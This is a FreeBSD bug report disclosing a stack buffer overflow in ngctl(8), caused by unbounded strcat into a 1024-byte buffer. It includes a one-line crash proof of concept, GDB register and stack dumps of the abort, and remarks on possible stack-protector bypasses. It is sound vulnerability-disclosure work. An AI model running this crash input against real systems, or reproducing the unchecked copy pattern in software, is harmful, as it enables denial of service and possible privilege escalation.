[Bug 293075] Stack-based buffer overflow in ngctl(8)

Mon, 09 Feb 2026 17:22:14 -0800 

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=293075

            Bug ID: 293075
           Summary: Stack-based buffer overflow in ngctl(8)
           Product: Base System
           Version: 14.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: bin
          Assignee: [email protected]
          Reporter: [email protected]

Created attachment 267934
  --> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=267934&action=edit
ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c
'print("B"*1200)')

Dear FreeBSD Security Team,
I am reporting a stack-based buffer overflow in ngctl(8) that allows any user
to crash (and potentially exploit to code execution) the binary, which is
typically executed as root. 

I want register a CVE for this memory corruption vulnerability.


Vulnerability Details

File: usr.sbin/ngctl/config.c (function ConfigCmd)
Buffer: char buf[NG_TEXTRESPONSE]; → NG_TEXTRESPONSE == 1024
Vulnerable code (still present in current main branch – confirmed via
cgit.freebsd.org):

Cchar buf[NG_TEXTRESPONSE];
*buf = '\0';
for (i = 2; i < ac; i++) {
    if (i != 2)
        strcat(buf, " ");
    strcat(buf, av[i]);        /* ← NO BOUNDS CHECKING */
}


Proof of Vulnerability (PoC + GDB)
Reproduction (any FreeBSD 13/14/15-CURRENT):

ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c
'print("B"*1200)')

Crash output:
textngctl: send msg: No such file or directory
Feb  9 18:39:10 hostname ngctl[980]: stack overflow detected; terminated
Abort trap (core dumped)


root@igor:~ # gdb ngctl -q
GEF for freebsd ready, type `gef' to start, `gef config' to configure
93 commands loaded and 5 functions added for GDB 15.1 [GDB v15.1 for FreeBSD]
in 0.00ms using Python engine 3.11
Reading symbols from ngctl...
(No debugging symbols found in ngctl)
gef➤  r config dummy $(python3 -c 'print("A"*1200)') $(python3 -c
'print("B"*1200)')



[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────
registers ────
$rax   : 0x0               
$rbx   : 0x000000080111e644  →  "stack overflow detected; terminated"
$rcx   : 0x00000008012152da  →  <getpid+000a> jb 0x801215178
$rdx   : 0x0               
$rsp   : 0x00007fffffffcf88  →  0x00000008012188b0  →   mov edi, 0x7f
$rbp   : 0x00007fffffffcfd0  →  0x00007fffffffcfe0  →  0x00007fffffffd860  → 
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"
$rsi   : 0x6               
$rdi   : 0x422             
$rip   : 0x000000080121545a  →  <kill+000a> jb 0x801215178
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x0               
$r11   : 0x000000080182d4a8  →  0x0032302d00544d4c ("LMT"?)
$r12   : 0x00000008012cb950  →  0x64a4d3bb4ddc49a0
$r13   : 0x4               
$r14   : 0x00007fffffffcf90  →  0xffffffffffffffdf
$r15   : 0x2               
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow
resume virtualx86 identification]
$cs: 0x43 $ss: 0x3b $ds: 0x3b $es: 0x3b $fs: 0x13 $gs: 0x1b 
──────────────────────────────────────────────────────────────────────────────────────────────────────
stack ────
0x00007fffffffcf88│+0x0000: 0x00000008012188b0  →   mov edi, 0x7f        ← $rsp
0x00007fffffffcf90│+0x0008: 0xffffffffffffffdf   ← $r14
0x00007fffffffcf98│+0x0010: 0xffffffffffffffff
0x00007fffffffcfa0│+0x0018: 0x0000000000000000
0x00007fffffffcfa8│+0x0020: 0x0000000000000000
0x00007fffffffcfb0│+0x0028: 0x0000000000000000
0x00007fffffffcfb8│+0x0030: 0x0000000000000000
0x00007fffffffcfc0│+0x0038: 0x00007fffffffe497  →  0x414100796d6d7564
("dummy"?)
────────────────────────────────────────────────────────────────────────────────────────────────
code:x86:64 ────
   0x801215450 <kill+0000>      mov    eax, 0x25
   0x801215455 <kill+0005>      mov    r10, rcx
   0x801215458 <kill+0008>      syscall 
 → 0x80121545a <kill+000a>      jb     0x801215178      NOT taken [Reason:
!(C)]
   0x801215460 <kill+0010>      ret    
   0x801215461                  int3   
   0x801215462                  int3   
   0x801215463                  int3   
   0x801215464                  int3   
────────────────────────────────────────────────────────────────────────────────────────────────────
threads ────
[#0] Id 1, stopped 0x80121545a in kill (), reason: SIGABRT
──────────────────────────────────────────────────────────────────────────────────────────────────────
trace ────
[#0] 0x80121545a → kill()
[#1] 0x8012188b0 → mov edi, 0x7f
[#2] 0x801218820 → __stack_chk_fail()
[#3] 0x1026e9b → int3 
──────────────────────



The overflow reaches the stack canary (and potentially saved return
address/ebp) → confirmed stack smash.

root@igor:~ # uname -a
FreeBSD igor 14.3-RELEASE FreeBSD 14.3-RELEASE releng/14.3-n271432-8c9ce319fef7
GENERIC amd64


Impact

DoS → any user with access to ngctl can crash it.
Code execution → root binary + stack overflow. SSP prevents simple ROP, but
bypasses exist (older builds, -fno-stack-protector, infoleak, etc.).
Common scenario: jails, monitoring scripts, or any system with netgraph
enabled.

I want register a CVE for this memory corruption vulnerability

Credits:
Author: Igor Gabriel Sousa e Souza
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/igo0r



Thanks!

-- 
You are receiving this mail because:
You are the assignee for the bug.

Reply via email to